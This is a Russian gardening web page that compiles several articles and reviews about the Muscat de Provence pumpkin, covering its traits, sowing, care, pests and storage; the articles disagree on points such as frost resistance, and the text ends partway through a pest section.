25 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Тыква мускат де прованс отзывы описание сорта выращивание фото цена

Тыква Мускат де Прованс (Мускатная Прованская): описание сорта

Тыква Мускат де Прованс относится к среднеспелым французским сортам, выведенным компанией «Clause Tezier». Сорт обладает высокой урожайностью и относительной неприхотливостью в уходе. Тыква может выращиваться в теплом и умеренном климате; ее плоды обладают прекрасным вкусом, хорошей лежкостью и транспортабельностью.

Описание сорта тыквы Мускатная Прованская

По описанию сорта тыквы Мускат Прованса растение представляет собой траву со стелющимися по земле толстыми шершавыми плетьми. Количество плетей достигает 4-7. Их длина может доходить до нескольких метров.

На плетях располагаются усики, которыми тыква цепляется за препятствия, поднимаясь по ним вверх. Также на стеблях располагаются крупные пятилопастные листья, диаметром от 5 до 8 см. Крупные цветки (до 10 см в диаметре) имеют желто-белый цвет. Они колокольчатой формы и имеют по 5 лепестков. Время цветения приходится на конец мая.

Цветение длится несколько дней. Опыление производится при помощи насекомых, преимущественно пчел. В случае их отсутствия опыление осуществляется искусственно. Плоды тыквы называются тыквинами. Как правило, на одном стебле завязываются 1-2 тыквины.

Описание плодов

Плоды диаметром около 40 см и весом от 7 до 10 кг. Они оранжево-коричневого цвета и округло-приплюснутой формы. Ребристость плодов ярко выраженная. На этапе технической спелости цвет плодов серовато-зеленый. Корочка прочная и гладкая.

Мякоть у плода Муската прованского имеет яркий оранжевый цвет, она плотная и очень сладкая. В составе мякоти тыквы сдержится более 15% сахара и более 20% крахмала. В тыкве присутствуют витамины С, Е, В1 и В2, фосфорная и кремниевая кислота, большое количество железа, кальция, магния и других микроэлементов.

Преимущественно мякоть применяется для приготовления соков и пюре, но ее можно употреблять и в свежем виде. Мускат Прованса является диетическим продуктом. Ее мякоть рекомендуется употреблять людям, страдающим заболеваниями сердечно-сосудистой, пищеварительной и выделительной систем.

Отдельно следует сказать о полезных свойствах масла из семечек Мускат де Прованс. Содержащееся в них тыквенное масло используется для профилактики заболеваний нервной и эндокринной систем.

Время хранения спелых тыкв составляет около полугода.

Характеристика тыквы Мускат де Прованс

Сорт тыквы Мускат де Прованс не отличается морозоустойчивостью и требует около 4 месяцев с момента появления всходов до полного созревания, поэтому в северных регионах она может просто не успеть созреть.

Засухоустойчивость у растения средняя, ей требуются регулярные поливы раз в 7-10 дней.

Урожайность составляет от 3 до 5 плодов с одного растения, что, в зависимости от степени посадки, соответствует 20-30 кг с 1 кв. м.

Устойчивость к вредителям и заболеваниям

Устойчивость к болезням у данного сорта средняя. Как и все тыквенные, она может быть подвержена атакам грибковых заболеваний (бактериоз, мучнистая роса и проч.), а также нашествиям вредителей, в частности, паутинного клеща.

Грибковые заболевания могут быть остановлены при помощи опрыскивания листвы 1% раствором медного купороса. В случае мучнистой росы дополнительно применяют 70% раствор коллоидной серы.

При появлении на стеблях следов активности паутинного клеща (обвитие зеленой части растения липучей паутиной) применяют настойку из луковой и чесночной шелухи. Опрыскивания делают ежедневно в течение 10 дней.

Достоинства и недостатки

Согласно отзывам, тыква мускатная прованская имеет следующие достоинства:

  • неприхотливость в выращивании;
  • крупные плоды с прекрасным вкусом;
  • высокая урожайность;
  • хорошая сохранность плодов.

К недостаткам можно отнести:

  • невозможность выращивания в северных районах;
  • уязвимость к грибковым заболеваниям во влажном климате.

Технология выращивания тыквы Мускат де Прованс

Выращивать тыкву Мускат де Прованс можно как рассадным, так и безрассадным способом. Естественно, в более холодном климате используется первый способ посадки, в более теплом – второй. Теоретически можно ускорить сроки созревания тыквы, если использовать рассадный способ выращивания и выращивание тыквы в теплице, однако на практике это делают редко, поскольку тыква требует достаточно больших площадей, а ее тепличное выращивание не оправдано.

Поскольку тыква Мускат Прованса предпочитает почвы с большим количеством гуминовых соединений и растворимых минеральных солей, выращивать ее следует на суглинках средней плотности, имеющий нейтральную кислотность.

Желательно за полгода до посадки тыквы удобрить почву перегноем или перепревшим навозом.

Предшественниками тыквы могут быть крестоцветные, бобовые, лук, свекла или редька. Рекомендуется перед посадкой на участке посадить сидераты из бобовых или злаковых культур.

Посадка в открытый грунт

Для посева тыквы безрассадным способом применяют только крупные и качественные семена, прошедшие дефектовку. При этом сразу же отбирают высушенные семена или те, которые имеют повреждения скорлупы.

Семена предварительно обрабатывают, чтобы ускорить появление всходов. Для этого их нагревают в течение 2-3 часов при температуре + 50-60 °С, а затем проращивают обернутыми в смоченную водой марлю в течение нескольких дней. После чего их высеивают по 2-3 штуки в одну лунку на огороде.

При этом используется квадратно-гнездовой способ выращивания и схема посева от 0,7х0.7 м до 1,5х1,5 м. Семена при этом заглубляются на 5-10 см. Обычное время высаживания семян – конец апреля или середина мая, когда почва на глубине 10-12 см нагреется до температуры не менее + 12-14 °С.

При благоприятном стечении обстоятельств всходы тыквы Мускат Прованса появятся в течение 1-1,5 недель. Из нескольких проросших растений одной лунки через неделю после всходов оставляется одно, наиболее сильное.

Рассадное выращивание

Если необходим более ранний урожай, тыкву можно высаживать через рассаду. Сама процедура посадки растения через рассаду достаточно проста.

Смена высаживают в начале или середине апреля в горшочки. Состав почвы стандартный для рассады любой другой огородной культуры. Это может быть двух- или трехкомпонентная смесь (торф и песок; земля, перегной и песок; земля, торф и песок и т. д. в необходимых пропорциях), а может быть просто обычная земля, принесенная с огорода, в котором будет производиться выращивание.

Примерно через неделю появляются первые всходы. За две недели они укоренятся, окрепнут и будут готовы к высадке в открытый грунт. Далее с ними поступают аналогично семенам при выращивании в открытом грунте (квадратно-гнездовая посадка с шагом от 0,7 до 1,5 м).

Прополка сорняков

Уход за тыквой Мускатной прованской состоит в регулярном истреблении сорняков, поливах, подкормках и прочих текущих работах на участке. Большая площадь участка, свободная в первые месяцы выращивания, дает возможность прорасти большому количеству сорняков. Кроме того, по мере роста растения сложность этих работ повышается, т. к. разросшаяся тыква не дает свободно перемещаться по участку.

Поэтому период начала выращивания культуры, пока плети тыквы не достигли длины порядка 1 м, следует преимущественно посвятить именно борьбе с сорняками. Их следует пропалывать регулярно, с периодичностью в 3-4 дня, стараясь при этом не задевать молодые плети.

Полив

Полив является наиболее критичным в уходе за растением, поскольку на плодородной почве тыкве кроме него не нужен никакой другой уход. Рекомендуемая частота поливов – 1 раз в неделю. Норма расхода воды – 20 л на 1 кв. м. Во время созревания плодов эту норму сокращают до 10 л на 1 кв. м, чтобы избежать трещин в плодах.

Подкормки

При достаточно плодородной почве растение не нуждается в подкормках. В случае бедных почв необходимо его подкармливать 2 раза в месяц азотными и калийными удобрениями. Рекомендуется совмещать органические и комплексные минеральные удобрения.

Опора для стеблей

Отдельно следует сказать о дополнительных подпорках, к которым будут прикрепляться стебли тыквы. Поскольку растение может сформировать от 4 до 7 плетей, а их длина доходит до 8 м, площади участка может не хватить для размещения столь большого объема зеленой массы. Для того чтобы все разместилось достаточно компактно, применяют специальные опоры в виде натянутых между столбиками крупноячеистых сеток, за которые и будут цепляться усы стеблей.

Их высота не должна быть слишком большой, поскольку масса плодов тыквы очень велика. Обычно, применяются сетки высотой порядка 0,5 м.

Заключение

Тыква Мускат де Прованс является среднеспелым сортом с крупными плодами, обладающими превосходным вкусом. Сорт достаточно неприхотлив и требует минимального ухода при выращивании. Плоды могут храниться в течение полугода без потери вкусовых качеств.

Отзывы о тыкве Мускат де Прованс

Тыква Мускат де Прованс

Не сложно догадаться о том, откуда родом удивительный сорт тыквы Мускат де Прованс. Эта французская культура относится к растениям со средним сроком созревания плодов. Сорт отличается обильным плодоношением и неприхотливым нравом. Тыква сорта Мускат де Прованс распространилась на большие территории благодаря тому, что хорошо произрастает при тёплых температурах. Овощи отлично подходят для длительного хранения в свежем виде и транспортировки.

Тыква Мускат де Прованс: описание сорта

Мускат де Прованс

Внешний вид культуры напоминает травянистое растение с мощными стеблевыми побегами, которые стелются по поверхности земли. Их количество может достигать более пяти штук. В длину плети вырастают до трёх метров.

Поверхность стеблей покрыта небольшими крючками, которые хватаются за любую опорную конструкцию. Таким образом, растение стремительно растёт вверх. Помимо этого на стеблях расположена крупная листва.

Во время цветения на культуре появляются крупные бутоны нежно-жёлтого цвета. По форме они напоминают колокольчик с несколькими лепестками. Этот период обычно приходится на конец весны.

Цветёт растение два-три дня. Сорту необходимо насекомые-опылители, например пчёлы. Если нет возможности естественного процесса опыления, его проводят искусственно.

Характеристика овощей.

Тыквы сорта Мускат де Прованс достаточно крупные. Они достигают массы до десяти килограмм. Форма овощей округлая, приплюснутая с боков. Для плодов характерен грязно-оранжевый окрас. Внешне тыква поделена на равные сегменты.

На ранних этапах созревания овощи имеют характерный зеленоватый цвет. Сверху тыква покрыта толстой твердой кожурой.

Внутри плода сочная оранжевая мякоть. Она обладает удивительными вкусовыми качествами. Помимо этого овощи сорта Мускат де Прованс являются богатым источником витаминов и микроэлементов для организма человека.

Чаще всего овощи сорта Мускат де Прованс используют для приготовления напитков и пюре. Однако они отлично подходят для употребления в сыром виде. Плоды обладают низкой калорийностью. Это позволяет вводить их в диетический пищевой рацион.

Благодаря своим полезным свойствам овощи рекомендуется регулярно употреблять людям, страдающим от заболевания сердца, сосудов и органов пищеварения.

Но не только употребление мякоти может оказать благотворное влияние на организм человека. Много пользы принесёт масло из семечек овощей.

Стоит отметить, что принести пользу и порадовать сладким вкусом могут только полностью созревшие овощи.

Плоды этого сорта долго сохраняют свежесть. Урожай может храниться весь зимний период.

Отличительные особенности тыквы сорта Мускат де Прованс

Тыква Мускат де Прованс фото сорта

Культура относится к теплолюбивым растениям со средним сроком созревания. Примерно через сто двадцать дней после высадки в открытый грунт растение принесёт первый урожай. По этой причине не рекомендуется выращивать сорт в регионах с прохладными климатическими условиями.

Культура нормально переносит умеренную засуху, её достаточно поливать один раз в неделю.

Урожайность сорта зависит от погодных условий. При выращивании в тёплых регионах этот показатель достаточно высокий.

Устойчивые качества перед атаками вредоносных насекомых и болезней

Сорт Мускат де Прованс нельзя назвать сильно устойчивым перед атаками вредоносных насекомых и болезней. Как и другие культуры, это растение подвержено нападению грибков, бактериоза, мучнистой росы, белой гнили. Помимо болезней, тыкву атакуют вредоносные насекомые. Например паутинный клещ или тля.

Если Ваше растение подверглось поражению грибковым заболеванием, в борьбе с ним поможет 1% раствор медного купороса. А для избавления от мучнистой росы рекомендуют применять 70% раствор коллоидной серы.

Если Вы заметили на листве растения наличие липкой паутины, это явный признак присутствия паутинного клеща. В борьбе с ним поможет отвар из луковой или чесночной шелухи.

Мускат де Прованс: плюсы и минусы сорта

Сорт Мускат де Прованс обладает рядом преимуществ:

  • Не требует трудоёмкого ухода в процессе выращивания.
  • Овощи достигают крупных размеров. Обладают удивительными вкусовыми качествами.
  • Регулярное и обильное плодоношение.
  • Овощи подходят для длительного хранения и транспортировки.

Так же сорт обладает некоторыми недостатками:

  • Культура не подходит для выращивания в регионах с прохладными погодными условиями.
  • Сорт подвержен атакам грибковыми заболеваниями при избытке влаги.

Основные правила по выращиванию культуры

Культура подходит для высаживания сразу в открытый грунт. Кроме того, её можно выращивать с помощью рассадного материала. Соответственно, первый вариант подходит для регионов с тёплым климатом. Второй — для более прохладных погодных условий.

Можно существенно сократить сроки выращивания культуры. Если использовать рассадный материал и применять тепличную конструкцию. Однако для этого придётся соорудить достаточно большую теплицу. А она наверняка займёт много места на огородном участке.

Для сорта Мускат де Прованс хорошо подходят суглинистые почвы с нейтральной кислотностью.

Рекомендуется заранее начать подготовку участка для выращивания овощей. Примерно за шесть месяцев до высадки вскопайте грунт и внесите органическое удобрение.

Хорошими предшествующими культурами для тыквы станут лук, свёкла, редис. Преимуществом будет наличие травяных или злаковых растений.

Правила по высадки семян в открытый грунт

При высаживании семян сразу в открытый грунт необходимо убедиться в качестве посевного материала. Но сначала необходимо избавиться от пустых и дефектных экземпляров.

Для того, чтобы простимулировать прорастание семян, их необходимо дополнительно обработать. С этой целью они проходят термическую обработку в течение нескольких часов. После чего оборачиваются влажной марлевой тканью и хранятся так пару дней.

После этих подготовительных процедур семена готовы к высадке на открытый участок.

Схема посева для культуры — семьдесят на семьдесят сантиметров. Рекомендуется высаживать семена в тёплую погоду в середине весеннего сезона.

При соблюдении всех рекомендаций по высадке семян в открытый грунт, первые всходы начнут появляться примерно через десять дней. По мере роста необходимо избавиться от слабых растений.

Выращивание с помощью рассадного материала

Если вы хотите ускорить процесс созревания плодов, то можно использовать рассадный способ выращивания культуры. Особых сложностей в этом процессе нет.

В середине весеннего периода необходимо высадить семенной материал в индивидуальные ёмкости. Особых требований к грунту сорт не предъявляет.

Поэтому вы можете использовать специализированную почвенную смесь. Ну, или почву со своего огородного участка, которая будет на постоянном месте произрастания культуры.

Спустя семь-десять дней начнут появляться первые ростки. Буквально через пятнадцать дней молодые саженцы можно отправлять на участок. Далее соблюдайте все рекомендации по высаживанию растения в открытый грунт.

Важный совет для дачников. Не стоит пренебрегать дистанционным расстоянием между двумя соседними растениями. Это условие очень важно для правильного роста и развития культуры.

Удаление сорняковой травы

Основные мероприятия по уходу за тыквами сорта Мускат де Прованс. Удаление сорняковой травы, регулярный полив, внесение удобрений и другие стандартные процессы.

Так как кусты занимают достаточно большую площадь на участке, требуется много времени, чтобы прополоть всю сорняковую траву. Когда листва культуры становится крупнее и раскидистей, проводить эту процедуру становится еще сложнее.

По этой причине рекомендуется систематически удалять новые сорняковые растения каждые несколько дней. Эту процедуру необходимо проводить до тех пор, пока стеблевые отростки тыквы полностью не сформируются.

Стоит отметить, что нельзя тревожить цветущее растение. Осыпание бутонов сорта Мускат де Прованс может губительно отразиться на плодоношении культуры.

Правила полива

Несмотря на то, что растение достаточно стойко переносит кратковременную засуху, стоит регулярно поливать овощи. Достаточно проводить эту процедуру один раз в неделю. В тот период, когда на кустах созревают плоды, стоит использовать в два раза меньше воды для полива. Для того, чтобы не создавать избытка влаги.

Внесение удобрений

Если на Вашем участке почвы с высоким уровнем плодородия, культуре не потребуется дополнительного внесения удобрений. Однако если растение находится на бедном грунте, понадобится внесение азотных и калийных комплексов. Так же допускается внесение органических удобрений.

Использование опорной конструкции

Использование опорной конструкции в процессе выращивания овощей позволяет сократить площадь для выращивания культуры. Так как стеблевые отростки тыквы достаточно длинные, для них требуется много места, если они будут находиться на поверхности земли.

Поэтому опытные дачники используют специальные конструкции. Или высаживают культуру вблизи дачного ограждения.

Вывод

Овощи сорта тыквы Мускат де Прованс отлично подходят для выращивания на огородном участке. Неприхотливый нрав культуры и удивительные вкусовые качества овощей являются основными преимуществами этого вида.

Также стоит отметить возможность длительного срока хранения плодов в свежем виде. Как показывает практика, практически все дачники, кто хоть раз выращивал этот сорт на своём участке, сажают его вновь.

Тыква Мускат де Прованс. Мнение дачников

Николай Иванович, г. Волгоград.

Я слышал много хвалебных отзывов о сорте Мускат де Прованс. Поэтому решил посадить эту культуру на своём огородном участке. Я очень удивился тому, что растение не требует трудоёмкого ухода. Более того, мне удалось с первого раза собрать очень богатый урожай.

На следующий год я посадил овощи на менее плодородном участке. Несмотря на это, урожай был очень хорошим. Я с тех пор всем советую попробовать этот сорт тыквы. Плоды крупные и очень вкусные.

Хорошо лежат и не портятся почти всю зиму. Жена готовит из тыквы очень вкусную кашу и варит варенье. Я очень доволен сортом Мускат де Прованс. Рекомендую и Вам!

Ольга Васильевна, г. Курск.

Раньше я думала, что получить богатый урожай тыквы достаточно сложно. Потому что потребуется трудоёмкий уход за культурой. Однако я поняла, что ошибалась, столкнувшись с сортом Мускат де Прованс.

После высадки на открытый участок я регулярно полола сорняковую траву. Это было единственным необходимым мероприятием по уходу за растением. Почва на нашем участке плодородная, поэтому удобрений вносить не пришлось.

С первого раза я собрала очень хороший урожай. Тыквы очень сладкие и сочные. Особенно хорошо то, что плоды долго хранятся в свежем виде. Тыква подходит для консервации. Я делаю компот и варенье. Мы почти всю зиму едим овощи с огорода. Всем рекомендую этот удивительный сорт

Французская гостья на вашем участке — тыква «Мускат де прованс»: чем хороша и как её правильно вырастить

Свое название тыква Мускат де Прованс получила благодаря одноименному региону на юге Франции. Прованс славится своими травами, сырами и виноградом. Мускатная тыква — не исключение. Сладкий вкус овоща пришелся по нраву многим. Чтобы не искать Мускат де Прованс на полках супермаркета, дачники предпочитают выращивать ее на своих огородах. Почему культуру так любят в России, и как получить хороший урожай, читайте в нашей статье.

Описание сорта тыквы

Все мускатные сорта отличаются насыщенным цветом. Эти овощи — самые сладкие из всех тыквенных сортов, имеют мясистую и сочную мякоть. В уходе культура неприхотлива, предпочитает смесь суглинистых и супесчаных почв.

Гибрид f1

Мускат де Прованс – это результат работы французских селекционеров. Они вывели морозоустойчивый сорт с очень толстой кожурой. Помимо этого, растению не страшны засуха или жара, поэтому выращивают Мускат де Прованс в любом регионе России.

Как и полагается гибриду, сорт устойчив перед такими распространенными болезнями, как белая гниль или бактериоз.

Интересно! Компания-производитель Clause Tezier существует уже более 200 лет, и считается признанным лидером на рынке селекции. Помимо тыквы, селекционеры создают качественные и вкусные сорта перца, капусты, дыни, арбуза и кабачков.

Отличительные черты

Сорт среднеспелый, урожай созревает за 115 дней. Высаживают его в открытый грунт или в теплицы. Растение мощное, листьев много. Мускат де Прованс показывает высокую и стабильную урожайность, хорошо реагирует на органические подкормки, зачастую выращивается не только для личного потребления, но и для продажи.

Характеристика плодов и урожайность

Тыквы большие, коричнево-оранжевого цвета. Поверхность твердая и ребристая. Вес одного овоща – от 5 до 10 кг, диаметр – около 50 см. Мякоть ярко-оранжевая, с большим содержанием сахара. Мускат де Прованс отлично хранится. С 1 кв. м дачники получают около 40 кг красивых и вкусных овощей.

Интересно! Тыква сорта Мускат де Прованс благодаря своей внешности отлично подходит для создания светильников на праздник Хэллоуин. По легенде, такие светильники отгоняют от дома злых духов.

Как выращивать

Посадка и выращивание сорта Мускат де Прованс – увлекательное занятие. При соблюдении всех правил тыквенные грядки вознаграждают богатым и вкусным урожаем. Рассмотрим далее, какими способами дачники высаживают овощ, и как ухаживают за ним.

Посадка семенами

Первый способ подразумевает высадку семян сразу в открытый грунт. Больше всего он подходит для садоводов из южных областей страны, где более плодородная почва и теплый климат. Технология посадки семенами выглядит следующим образом:

  1. Обеззараживание семян. Приобретайте семена в проверенных местах, обращайте внимание на сохранность упаковки. Осмотрите материал на наличие внешних отклонений. Испорченные семена, на которых есть пятна или царапины, выбросьте. Качественные продезинфицируйте в растворе перекиси водорода, предварительно поместив в тканевый мешочек и опустив на 5 минут в жидкость. Затем достаньте из мешочка, разложите на чистой марле и просушите.
  2. Закаливание семян. Поместите материал в поддон морозильной камеры и оставьте его там на 20 часов. Затем достаньте семена и оставьте на 5 часов при комнатной температуре, после чего отправьте обратно в морозильник. Повторяйте процедуру на протяжении 5 суток. Закаливание укрепляет иммунитет растений, защищает от воздействия внешних факторов, усиливает морозоустойчивость.
  3. Обеззараживание земли. Прежде чем сеять продезинфицированные и закаленные семена, перекопайте землю и проведите ряд обеззараживающих процедур. Наиболее активно дачники применяют такие агротехнические приемы, как соблюдение севооборота и использование сидератов. Сидераты – это растения, которые улучшают качество почвы. Их высеивают во время уборки урожая. Непосредственно перед посадкой почву известкуют, чтобы понизить уровень кислотности, а также проливают кипятком, чтобы убить опасные бактерии.

Семена Мускат де Прованс высевают при температуре почвы 10-12 градусов. В одну лунку помещают 3 семени, сверху посыпают землей и обильно поливают. Расстояние между саженцами должно быть не менее 1 м. Первые всходы появляются через неделю после посева.

Посадка рассадой

Рассадный способ больше подходит для Урала и Сибири. После обеззараживания семена прорастите. Для этого поместите материал во влажную марлю и держите в теплом месте на протяжении одной недели. Проращивание улучшает всхожесть сорта, ускоряет рост.

Для стимуляции используйте препараты «Фитоспирин+» или «Эпин», которые еще и защищают будущий урожай от болезней и вредителей. Будьте аккуратны, используйте средства в соответствии с дозировками, которые указаны на упаковке. Переизбыток стимуляторов только навредит молодым росткам.

Высаживайте рассаду в цветочные горшки или деревянные ящики. Используйте готовый грунт или предварительно продезинфицированную землю с огорода. Держите рассаду в теплом и солнечном месте. При недостатке света организуйте дополнительную подсветку люминесцентными лампами. Поливайте саженцы каждые 7 дней. Лучше использовать фильтрованную и отстоянную воду. Через 10 дней внесите жидкие органические удобрения, еще через 2 недели – минеральные подкормки, например, мочевину или аммиачную селитру.

Высеивают Мускат де Прованс преимущественно в начале мая. Лучше всего тыква приживается на грядках после бобовых культур или лука. На 1 кв. м рекомендуют высаживать не более 1-2 кустов. Для создания наиболее благоприятных условий на грядки вносят компост или торф.

Как правильно ухаживать за гибридным сортом Мускат де Прованс? Прежде всего соблюдайте режим полива и прополки, а также уделяйте внимание формированию кустов и внесению удобрений. Кроме того, не забывайте распутывать плети и проводить профилактику от болезней.

Прополка

Прополка включает в себя комплекс процедур из рыхления грядок и удаления сорняков. Рыхлят почву каждую неделю, преимущественно после дождей или туманов. Рыхление улучшает доступ кислорода к корням. Из сорняков на грядках чаще всего встречаются вьюнки, которые также регулярно вырывают вместе с корнями. Без прополки грядок невозможно получить качественный урожай.

Полив

После высадки грядки обильно поливают, следующий полив организуют только через 10 дней. Лучше всего использовать дождевую воду, так как она намного мягче водопроводной. Самый простой метод собрать дождевую воду – установить на участке емкости и водосточные трубы. Размер резервуара зависит от площади сада. Поливать грядки рекомендуют после прополки или вместе с внесением удобрений.

Удобрения

Для отличного урожай чередуйте минеральные и органические подкормки. Сорт Мускат де Прованс отлично реагирует на минеральный комплекс «Здравень», приобрести который можно в любом магазине для садоводов. «Здравень» насыщает кусты кальцием и азотом, защищает от болезней. Также культура любит жидкий птичий помет, который дачники вносят 2-3 раза за весь период. На 1 кв. м используют около 100-150 г удобрения. Помимо этих средств, популярны подкормки золой, дрожжами, молочной сывороткой и крапивой.

Особенности выращивания и возможные трудности

Неопытные дачники сталкиваются с проблемой формирования кустов. Дело в том, что для нормального развития оставляют только по 2-3 тыковки на плетях, остальные овощи убирают, а верхушку прищипывают. Также советуют оставлять около 5 листьев, остальные ликвидируют. Если этого не сделать, то всем тыквам не хватит места и питания, чтобы вырасти большими. А прищипывание верхушки останавливает рост куста, когда в этом больше нет необходимости.

Если плети выросли до 2 м, распутайте их и положите на землю, присыпав сверху грунтом. Место присыпки поливайте, там образуются новые корни, которые укрепят растение. Если же сами овощи очень тяжелые, соорудите им дополнительную опору из подручных материалов.

Советы по выращиванию от опытных огородников

Для получения богатого урожая огородники советуют уделить особое внимание внекорневым подкормкам. Например, опрыскиванию бордоской жидкостью, которая защищает Мускат де Прованс от вредных воздействий. Помимо этого, дачники рекомендуют:

  • для посева выбирать самые крупные семена;
  • использовать в качестве удобрения жидкий навоз;
  • дважды внести калийную соль и суперфосфат;
  • не переувлажнять почву;
  • не вносить удобрения в сухую землю.

Болезни и вредители

Даже при правильном уходе гибрид может стать жертвой опасных насекомых или заболеваний. Особенно часто среди них встречаются:

  1. Бактериоз — характеризуется мелкими коричневыми пятнами на листьях. При первых признаках растение сразу обрызгайте раствором медного купороса и извести. Если плоды уже заражены, удалите их и закопайте.
  2. Корневая гниль – это грибок, который покрывает стебли и корни бурым цветом. Причины заражения кроются в неправильном поливе. Для лечения обработайте тыквенные грядки раствором медного купороса.
  3. Мучнистая роса — грибковая инфекция, проявляется в виде белого налета на листьях. Споры грибка содержатся в почве или сорняках. Лечится грибок коллоидной серой.
  4. Проволочники – это червяки, которые живут под землей и уничтожают корни. Избавится от них поможет средство «Базудин». Однако будьте внимательны при его использовании, так как препарат токсичен.
  5. Ростковая муха поражает стебли и листья. В качестве профилактики перед посевом тщательно перекопайте почву и внесите удобрения. Для борьбы с ростковой мухой используйте раствор медного купороса.

Сбор и применение урожая

Традиционно сбор урожая начинается в середине сентября, когда тыквы достигают пика зрелости. Срывают плоды вместе в плодоножкой, чтобы они долго хранились. После сбора овощи протирают сухой тканью и помещают в подвал или гараж. Мускат де Прованс долго хранится, не теряет свои свойства.

Используют продукт преимущественно в кулинарии. Из тыквы готовят пироги, салаты, сок. Благодаря сладкому вкусу из тыквы получаются вкусные диетические десерты и выпечка. Овощ хорош как в свежем виде, так и после тепловой обработки. Помимо мякоти в пищу употребляют семечки и цветки растения.

Преимущества и недостатки сорта

Сорт Мускат де Прованс получил широкое распространение у многих дачников. Почему овощ пришелся по нраву? Прежде всего его ценят за:

  • простоту в уходе;
  • высокие вкусовые качества;
  • привлекательный товарный вид;
  • высокий иммунитет;
  • морозоустойчивость;
  • долгую степень хранения;
  • универсальность в использовании.

Из недостатков огородники отмечают лишь то, что иногда овощи достигают таких больших размеров, что без дополнительной опоры им не обойтись. Больше минусов у сорта Мускат де Прованс нет.

Отзывы фермеров

На форумах огородников можно встретить самые разные отзывы о тыкве Мускат де Прованс. Одни находят сорт урожайным и вкусным, другие пишут, что ожидали получить лучший урожай.

Яна, г. Москва: «Посадила Мускат де Прованс уже в третий раз. Ценю эту тыкву прежде всего за сладкую мякоть, которая прекрасно сочетается со многими другими продуктами. Тыковки красивые, оранжевые. Осенью храню их на балконе, а зимой убираю в кладовую».

Максим, г. Омск: «Из мускатных тыкв Мускат де Прованс нравится мне больше всего. Она не капризна в уходе, выращивать такой урожай – одно удовольствие. В среднем с одного куста я снимаю около 15 кг. Использую преимущественно в качестве вареных или печеных блюд, люблю питательный сок из тыквы, апельсина, имбиря и мяты».

Екатерина, г. Сочи: «Я огородник с 15-летним стажем, ежегодно высаживаю на участке новый сорт. Мускат де Прованс мне не понравился, потому что плоды завязывались плохо. В итоге я собрала в 3 раза меньше урожая, чем заявлено производителем. На следующий год точно буду сажать другой мускатный сорт, но не Мускат де Прованс».

Заключение

«Прованская» тыква проста в выращивании, применяется в кулинарии, и даже знаменитые «светильники Джека» из нее можно смастерить. Как и полагается мускатной тыкве, вкус у овоща на высоте, как и товарные качества. Выглядит тыковка всегда привлекательно.

Высаживают сорт по всей стране, будь то Сибирь или южные регионы. Гибрид крайне редко болеет, показывает стабильную высокую урожайность.

Тыква Мускат де Прованс: отзывы, описание, фото, выращивание, характеристика сорта, достоинства и недостатки

Описание сорта

Характеристика плодов

Далее представлены фото тыквы сорта Мускат де Прованс:






Достоинства и недостатки

У этого сорта тыквы есть свои достоинства, среди которых можно выделить основные:

Применение

Особенности выращивания

Посмотрите видео! Cорт тыквы Мускат Прованса

Отзывы, кто сажал

Отзывы о сорте тыквы Мускат Прованса огородники оставляют исключительно положительные.

Анна, г.Москва

Максим, г.Омск

Екатерина, г.Сочи

Галина, Подмосковье

Юлия, г.Воткинск

Вероника, г.Тверь

Оксана, г.Саранск

Татьяна, г.Набережные Челны

Если статья была полезна, поставь 5 звездочек!

(Пока оценок нет)

Мускат де прованс: французская тыква

Франция подарила миру множество различных сортов овощных культур и винограда. Упоминания о некоторых дарах полей встречаются во многих старинных трудах, трактатах, манускриптах и сказках. Чаще всего мы сталкиваемся с великолепным овощем – тыквой – в прекрасной сказке «Золушка». Неудивительно, что тыква сорта “мускат де прованс” является именно творением французских селекционеров.

Особенности строения и развития

Мускатная прованская тыква, как и множество других сортов, принадлежит к растениям семейства Тыквенные (Cucurbita). Ее родиной являются земли Центральной Америки. Это однолетняя культура, которая выращивается повсеместно, за исключением регионов с очень холодным климатом. Растение обладает мощными, но в то же время достаточно хрупкими, стелющимися стеблями. Большие и длинные черешковые листья имеют опушение. Крупные цветки ярко-желтого цвета продуцируют огромное количество пыльцы, что делает тыкву хорошим подспорьем в пчеловодстве.

Плоды, которые в простонародье называют тыквины, представлены ложными ягодами с большим количеством семян. Благодаря селекции форма плода может иметь разнообразные формы, но основной считается круглая. Плод мускатной тыквы имеет существенное отличие – он как бы поделен на дольки, что делает его еще более привлекательным.

Технология возделывания

Следует помнить, что тыква имеет тропическое происхождение, поэтому является теплолюбивым растением. В южных регионах России практически любой сорт полностью вызревает, одаривая огородников полноценными вкусными плодами. В северных регионах необходимо подбирать сорта с коротким сроком вегетации или выращивать культуру рассадным способом. Технология выращивания муската де прованс не отличается от возделывания других видов тыкв.

Посев семян

В открытый грунт семена де прованса высеваются тогда, когда почва достаточно прогрелась. Обычно это середина мая. Глубина заделки семян 5-6 см. При рассадном способе выращивания оптимальным временем посева семян в горшочки является последняя декада апреля. Всходы появляются через 6-7 дней после посева. За две-три недели рассада хорошо укоренится, молодые кустики наберут силу и будут готовы к высадке в открытый грунт. Схема высадки рассады на постоянное место должна быть не менее 70х70 см. При большей плотности растения не развиваются должным образом, образуя мелкие плоды.

Текущие работы

Пока тыква де прованс не образовала плети длиной более одного метра, это идеальное время для борьбы с сорняками. Чем больше растения – тем труднее дается прополка. Важно: не перемещайте цветущие плети, в большинстве случаев это приводит к опаданию цветков и потере урожая.

Полив

Урожайность мускатной тыквы де прованс напрямую зависит от полива. До образования первых завязей рекомендуется поливать растения не реже одного раза в неделю. Во время созревания плодов поливы уменьшают наполовину, чтобы избежать возможного растрескивания тыквин. Следует помнить, что норма расхода воды для взрослого растения должна быть не менее 20 литров на квадратный метр.

Сбор и хранение урожая

Уборку плодов тыквы мускусных сотов проводят осенью, непосредственно перед заморозками. Созревшие тыквины аккуратно срезаются с плодоножкой. Если тыква не дозрела, ничего страшного, она отлично дозаривается в процессе лежки. Хранить плоды можно при комнатной температуре, но оптимальной считается 8-10 градусов тепла.

Тонкости подкормки

Для получения добротного урожая мускатную прованскую тыкву необходимо подкармливать. Следует учитывать, что данная культура чувствительна к азоту и калию. Без этих элементов надеяться на хороший урожай нет смысла. Подкормку достаточно проводить два раза в месяц. Наилучший результат дает совмещение органических и комплексных удобрений.

По форме плода тыквенных легко определить нехватку элементов: плод имеет вид лампочки – не хватает калия, острое окончание плода – мало азота.

Болезни и вредители

Любой вид тыквы довольно устойчив к воздействию внешних факторов и вредителям, но и у них бывают случаи, когда дачникам приходится вооружаться химическими препаратами и спасать урожай. Рассмотрим самые распространенные:

